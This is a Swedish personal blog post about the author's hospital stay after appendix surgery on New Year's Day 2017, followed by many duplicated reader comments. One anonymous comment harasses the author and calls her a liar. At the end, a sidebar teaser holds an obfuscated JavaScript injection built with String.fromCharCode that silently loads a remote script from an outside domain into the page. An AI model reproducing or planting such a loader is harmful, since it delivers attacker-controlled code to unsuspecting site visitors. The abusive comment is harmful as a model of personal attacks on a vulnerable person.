Nyårsdagen! Forfarande på Danderyd!

image image image image image image image

Hej fina!

Nyårsdagen brukar vara en dag då t.o.m jag håller lågt tempo! Det har blivit lite av en tradition att äta pizza och marängsvisch rester…  Och att ligga på soffan och titta på Ivanhoe, med vänner. Pizza äter jag ibland. Men den pizzan på nyårsdagen är något speciellt 😉

Nu känns pizza mer än avlägset såklart…. Nu är målet att kunna äta något överhuvdtaget.  Idag är en såndär dag som är ”okay” att ta det lugnt och bara vara. Första dagen på det nya året! 2017 ✨

Just nu ligger jag på britsen. Tar det lugnt och vilar. Jag har sovit flera timmar på förmiddagen. Natten var tuff, lite sömn och mycket ont. Så jag är heeeelt färdig! Mitt största mission idag är att få igång magen! Alltså kunna göra nr 2.

Hur ofräscht det än är, så är det bara att erkänna att jag är HELT förstoppad! SKIT jobbigt ordagrant!  Det kan eventuellt vara orsaken till buksmärtorna. Alla organen är ju ömma efter titthåls operationen. Plus blindtarmen. Så det i kombination med en förstoppning kan ju kanske va anledningen till fasansfull smärta??? 

Jag hoppas nästan det. Så att man vet vad felet är nu. Så man kan få åtgärdat problemet, slippa ha ont och få komma hem!

Nu längtar jag hem!  Jag har fått dricka ”dunder dryck” som ska hjälpa magen igång. Promenad-order på det.

 Jag hänger på droppställningen och vankar fram och tillbaka i korridoren för att hjälpa tarmarna igång.

Jag har kunnat äta riktig mat för första gången sedan julafton. Örtmarinerad  kyckling med potatisgratäng. Jätte gott faktiskt 🙂

Varför trodde jag att sjukhusmat var äckligt? Snacka om förutfattade meningar… 

imageLilleman fyller år på onsdag 6 år blir min lilla kille ❤️

DÅ vill jag vara hemma och steka pannkakstårta till honom! Jag vara MÅSTE vara frisk då!

Just nu är jag väldigt tacksam. Självklart var jag ledsen över att fira nyår här inne.  Det kändes både ensamt, tragiskt och olustigt.

Men alla här inne är SÅ Omtänksamma, engagerade och peppande!

 DU som läser, följer, skriver och t.o.m ger husmorstips är ju bara helt fantastisk! TACK snälla du för din omtanke <3

Det värmer att ni verkligen är ”med” mig och bryr er så som ni gör…  Kraaaaam /My Martens

74 Komentarer

  1. Jag tycker verkligen synd om dig som fick ligga på sjukhus över nyår. Hoppas att magen kommer i gång av dundermedicinen. Kram o krya på dig.

  2. Hoppas du snart mår bättre! Hemskt att ha såna smärtor under en längre tid ?
    Vet Ludvig att du är på sjukhus och anledningen? När jag har varit på sjukhus (bl a njursten o en lättare magoperation) har jag märkt att mina barn är oroliga efteråt, att jag ska ”försvinna” från dem igen… Tur att detta hände när han inte var med dig i alla fall! Krya på dig o ta det riktigt lugnt därhemma sen!

  3. Fina My, jag lider så med dig. Du är så väl värd att få bli frisk och att må bra.
    Jag känner dig inte personligen, men det känns ändå på något konstigt sätt som om jag gör det ändå. Det är väl tack vara din härliga blogg som jag troget läser. Jag önskar Din allt gott under 2017 och att du ska vara pigg och kry igen så du kan fira Ludvigs födelsedag. STOR Krya-på-dig kram från mig ?

  4. Jag tycker verkligen synd om dig som fick ligga på sjukhus över nyår. Hoppas att magen kommer i gång av dundermedicinen. Kram o krya på dig.

  5. Hoppas du snart mår bättre! Hemskt att ha såna smärtor under en längre tid 🙁
    Vet Ludvig att du är på sjukhus och anledningen? När jag har varit på sjukhus (bl a njursten o en lättare magoperation) har jag märkt att mina barn är oroliga efteråt, att jag ska ”försvinna” från dem igen… Tur att detta hände när han inte var med dig i alla fall! Krya på dig o ta det riktigt lugnt därhemma sen!

  6. Fina My, jag lider så med dig. Du är så väl värd att få bli frisk och att må bra.
    Jag känner dig inte personligen, men det känns ändå på något konstigt sätt som om jag gör det ändå. Det är väl tack vara din härliga blogg som jag troget läser. Jag önskar Din allt gott under 2017 och att du ska vara pigg och kry igen så du kan fira Ludvigs födelsedag. STOR Krya-på-dig kram från mig 🙂

  7. Jag känner med dig, som inte har några nära o kära hos dig. Känner igen det från mig själv. Man känner sig så övergiven, vid såna här tillfällen. Men som tur är, har jag precis som du några fina, trogna vänner. Och de är guld värda.

  8. Jag måste säga att jag har en enorm personkännedom och skulle kunnat slå vad med dig, att du skulle fira nyår på sjukhuset.Allt för att synas o höras o för att läsarna ska tycka synd om dig?
    Å nu har du förstoppning på det! Vet ingen, som är så beräknande som du.
    Vad var det du gjorde, som fick dina fina vänner, som tog emot dig som en i familjen? Tror du vi är korkade ? Du glömde kanske den oskrivna regeln, att man Aldrig dejtar sina bästa vänners ex? En kvinna med klass, gör inte det ! Å du skyller på alla andra, för du har inget gjort? Om Detta är orsaken, till att era vägar gick isär så får du ta ditt ansvar. När du träffade den fina familjen och fick fira jul tillsammans med dem, hade du enligt egen utsago, ingen familj själv? Men det har vi alla märkt, att du har ju både en mamma o pappa? Mycket märkligt! Du ljuger som en häst travar.
    Dock hoppas jag att du snart piggnar till, för trots allt önskar jag inte dig, en allvarlig sjukdom.

    • Varför ens kommentera!Har du inget vettigt att skriva så låt bli.Ge kärlek istället för att sparka på nån som redan ligger. Skämms!!

    • Är du på riktigt!?!?
      Blir så jäkla förbannad på folk som måste skriva elaka saker! Har man inget bra att säga så säg inget alls..

    • Men du kan inte vara normal…..såklart därför använder du signatur Anonym.
      Jag finner inte ord för såna som dig. Sluta för fan!!!!!!

    • Anonym- du mår nog inte så bra. Hur f…n kan du bara gå in o skriva en sådan kommentar ???
      Du måste va väldigt bitter, möjligtvis avundsjuk på My.
      Nej du, kryp du tillbaka under din sten o stanna där ett bra tag o fundera på vad som glädjer dig. Du verkar ju inte gilla My direkt, ändå gör du dig besväret o gå in o båda läsa o skriva. Tycker du inte själv att det är lite märkligt ??
      Till My – hoppas att du kryar på dig nu ❤

    • Vad är det för trams ?! Min bästa väninna är ihop med mitt ex…funkar alldeles utmärkt. Skulle det vara ett problem? I-landsproblem möjligtvis.

    • Oj vilket inlägg…
      Fejka en blindtarmsinflammation?
      Magen stannar ofta av när man blivit sövd och opererad.
      Det gjorde min och det var obehagligt.
      Att skriva så till någon som är nyopererad, mår dåligt och känner sig ensam är inte ok någonstans.
      Nej skärpning!
      Varför posta ett sådant inlägg just nu?
      Förstår faktiskt inte det, lite vanligt folkvett tack!

    • @anonym (såklart)
      Har man fått sig lite innanför västen? Eller skriver du så illa även i vanliga fall?
      Vad surrar du om?
      Vad pratar du om för fina familjer och fina vänner?

    • Snälla My varför låter du sådana här kommentarer komma igenom samma sak varje gång från personen i fråga ta bort de istället.
      Krya på dig.

    • Anonym! Vilka är ” denna fina familj” som påtalas ibland i mys blogg? Den familjen måste vara helgon av nåt slag. Äcklad är vad jag blir. Oavsett vad my ev har gjort så finns det väl inget som rättfärdigar dina fruktansvärda inlägg.
      Jag fattar ju att du är en idiot av rang, och borde inte skriva. Vill säga till dig My att jag HOPPAS du aldrig mer svarar på svinets kommentarer. Krya nu på dig ! Från en medmänniska med känslor!

  9. Usch stackars dig!
    Har själv genomgått gbp, blindtarmsop, tarmvredsop och tagit bort gallan och vet hur djävulskt ont det gör efteråt av gasen som läkarna blåser upp buken med under op och förstoppningen har kommit som ett brev på posten. Gå i trappor hjälpte mig. Tog bort dropp påsen från droppställningen och knatade i trapporna på sjukhuset, upp å ner. Drack plommonjuice å körde microlax ?? Det underlättar betydligt när magen kommer igång.
    Krya på dig

  10. Jag känner med dig, som inte har några nära o kära hos dig. Känner igen det från mig själv. Man känner sig så övergiven, vid såna här tillfällen. Men som tur är, har jag precis som du några fina, trogna vänner. Och de är guld värda.

  11. Lilla vännen! Vilken otur du har! ? Finns fortfarande här om du känner för att prata av dig! Vi hördes via messenger förut.
    Krya på dig och ta det lugnt, jag håller tummarna att du blir bättre och kan göra pannkakstårta till Lillemannen ?❤️
    Kram kram Eva

  12. Jag måste säga att jag har en enorm personkännedom och skulle kunnat slå vad med dig, att du skulle fira nyår på sjukhuset.Allt för att synas o höras o för att läsarna ska tycka synd om dig?
    Å nu har du förstoppning på det! Vet ingen, som är så beräknande som du.
    Vad var det du gjorde, som fick dina fina vänner, som tog emot dig som en i familjen? Tror du vi är korkade ? Du glömde kanske den oskrivna regeln, att man Aldrig dejtar sina bästa vänners ex? En kvinna med klass, gör inte det ! Å du skyller på alla andra, för du har inget gjort😉 Om Detta är orsaken, till att era vägar gick isär så får du ta ditt ansvar. När du träffade den fina familjen och fick fira jul tillsammans med dem, hade du enligt egen utsago, ingen familj själv? Men det har vi alla märkt, att du har ju både en mamma o pappa? Mycket märkligt! Du ljuger som en häst travar.
    Dock hoppas jag att du snart piggnar till, för trots allt önskar jag inte dig, en allvarlig sjukdom.

    • Varför ens kommentera!Har du inget vettigt att skriva så låt bli.Ge kärlek istället för att sparka på nån som redan ligger. Skämms!!

    • Är du på riktigt!?!?
      Blir så jäkla förbannad på folk som måste skriva elaka saker! Har man inget bra att säga så säg inget alls..

    • Men du kan inte vara normal…..såklart därför använder du signatur Anonym.
      Jag finner inte ord för såna som dig. Sluta för fan!!!!!!

    • Anonym- du mår nog inte så bra. Hur f…n kan du bara gå in o skriva en sådan kommentar ???
      Du måste va väldigt bitter, möjligtvis avundsjuk på My.
      Nej du, kryp du tillbaka under din sten o stanna där ett bra tag o fundera på vad som glädjer dig. Du verkar ju inte gilla My direkt, ändå gör du dig besväret o gå in o båda läsa o skriva. Tycker du inte själv att det är lite märkligt ??
      Till My – hoppas att du kryar på dig nu ❤

    • Vad är det för trams ?! Min bästa väninna är ihop med mitt ex…funkar alldeles utmärkt. Skulle det vara ett problem? I-landsproblem möjligtvis.

    • Oj vilket inlägg…
      Fejka en blindtarmsinflammation?
      Magen stannar ofta av när man blivit sövd och opererad.
      Det gjorde min och det var obehagligt.
      Att skriva så till någon som är nyopererad, mår dåligt och känner sig ensam är inte ok någonstans.
      Nej skärpning!
      Varför posta ett sådant inlägg just nu?
      Förstår faktiskt inte det, lite vanligt folkvett tack!

    • @anonym (såklart)
      Har man fått sig lite innanför västen? Eller skriver du så illa även i vanliga fall?
      Vad surrar du om?
      Vad pratar du om för fina familjer och fina vänner?

    • Snälla My varför låter du sådana här kommentarer komma igenom samma sak varje gång från personen i fråga ta bort de istället.
      Krya på dig.

    • Anonym! Vilka är ” denna fina familj” som påtalas ibland i mys blogg? Den familjen måste vara helgon av nåt slag. Äcklad är vad jag blir. Oavsett vad my ev har gjort så finns det väl inget som rättfärdigar dina fruktansvärda inlägg.

      Jag fattar ju att du är en idiot av rang, och borde inte skriva. Vill säga till dig My att jag HOPPAS du aldrig mer svarar på svinets kommentarer. Krya nu på dig ! Från en medmänniska med känslor!

  13. Usch stackars dig!
    Har själv genomgått gbp, blindtarmsop, tarmvredsop och tagit bort gallan och vet hur djävulskt ont det gör efteråt av gasen som läkarna blåser upp buken med under op och förstoppningen har kommit som ett brev på posten. Gå i trappor hjälpte mig. Tog bort dropp påsen från droppställningen och knatade i trapporna på sjukhuset, upp å ner. Drack plommonjuice å körde microlax 👍💩 Det underlättar betydligt när magen kommer igång.
    Krya på dig

  14. Mitt bästa tips efter tre graviditeter för förstoppad mage är massor av linfrön i min havregrynsgröt på morgonen.
    Krya på Dig My!
    Kram Sofie

  15. Jag måste säga att vad är det för problem om man skulle dejta en väns ex? Inget anser jag ? Är kärleken dem emellan slut så är det väl inget problem. Vänner som säger upp bekantskapen av en sån anledning är nog inga riktiga vänner………… Hittar man sann kärlek så är den värdefullare än vilken vänskap som helst om du frågar mig <3 Så många själsfränder finns det ej, men vänner kan du hitta många ? Krya på dig kramar till dig My ? 2017 kommer bli ett superår ?

  16. Lilla vännen! Vilken otur du har! 🙁 Finns fortfarande här om du känner för att prata av dig! Vi hördes via messenger förut.
    Krya på dig och ta det lugnt, jag håller tummarna att du blir bättre och kan göra pannkakstårta till Lillemannen 😀❤️
    Kram kram Eva

  17. Tänk på o hA tex liberal hemma mot förstoppning. Har inte varit på Danderyd men ska ditt i slutet av månaden. Fick bara soppa vid magproblem eller operation. Hoppas Kissen o sonen mår bra.

  18. krya på dig My ❤️ Hoppas verkligen att du mår bättre snart och att du kan fira din lilla lilleman på hans födelsedag❤️. Håller mina tummar jättehårt✊?.
    Snälla My ta INTE åt dig av vad ”Anonym” skriver. Så bitter o elak människa mår nog inte så bra själv.
    My du är en fantastisk fin människa & en jättego’ / bra mamma❤️.
    Massor av kramar till dig// Mia

  19. Mitt bästa tips efter tre graviditeter för förstoppad mage är massor av linfrön i min havregrynsgröt på morgonen.
    Krya på Dig My!
    Kram Sofie

  20. Jag måste säga att vad är det för problem om man skulle dejta en väns ex? Inget anser jag 🙂 Är kärleken dem emellan slut så är det väl inget problem. Vänner som säger upp bekantskapen av en sån anledning är nog inga riktiga vänner………… Hittar man sann kärlek så är den värdefullare än vilken vänskap som helst om du frågar mig <3 Så många själsfränder finns det ej, men vänner kan du hitta många 🙂 Krya på dig kramar till dig My 😉 2017 kommer bli ett superår 😉

  21. Tänk på o hA tex liberal hemma mot förstoppning. Har inte varit på Danderyd men ska ditt i slutet av månaden. Fick bara soppa vid magproblem eller operation. Hoppas Kissen o sonen mår bra.

  22. krya på dig My ❤️ Hoppas verkligen att du mår bättre snart och att du kan fira din lilla lilleman på hans födelsedag❤️. Håller mina tummar jättehårt✊🏻.
    Snälla My ta INTE åt dig av vad ”Anonym” skriver. Så bitter o elak människa mår nog inte så bra själv.
    My du är en fantastisk fin människa & en jättego’ / bra mamma❤️.
    Massor av kramar till dig// Mia

  23. Hoppas de blir bättre med magen minns när dom tog bort min livmoder för tio år sedan och magen skulle igång… Hujeda mej va jobbigt de var, bra du är inlagd för ev. koll på infektioner i buken . Ja tålamod är bara att ha finns ju inte så mkt mer o göra:)Lilleman förstår säkert om de dröjer, barn är kloka när dom är trygga som han är:) kram

  24. Hoppas de blir bättre med magen minns när dom tog bort min livmoder för tio år sedan och magen skulle igång… Hujeda mej va jobbigt de var, bra du är inlagd för ev. koll på infektioner i buken . Ja tålamod är bara att ha finns ju inte så mkt mer o göra:)Lilleman förstår säkert om de dröjer, barn är kloka när dom är trygga som han är:) kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/